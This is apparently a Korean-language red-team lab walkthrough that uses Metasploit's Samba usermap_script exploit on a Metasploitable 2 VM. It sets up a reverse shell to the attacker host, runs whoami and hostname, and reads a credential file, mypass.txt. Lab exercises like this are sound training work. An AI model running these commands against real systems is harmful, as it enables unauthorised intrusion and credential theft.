
RedTeam-SMB-PenTest |
|
msfconsole
공격자 호스트와 피해자 머신이 모두 부팅되어 실행 중인지 확인하십시오.

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K
jobs -K
# Restart Metasploit
msfconsole
usermap_script를 사용하는 레거시 서비스는 매우 취약합니다.| 구성 요소 | 세부 정보 |
|---|
| 공격자 VM | Kali Linux |
| 피해자 VM | Metasploitable 2 |
| 대상 포트 | 445 (Samba/SMB) |
| 사용된 익스플로잇 | exploit/multi/samba/usermap_script |
| 자격 증명 대상 | /redteam7/student3/mypass.txt |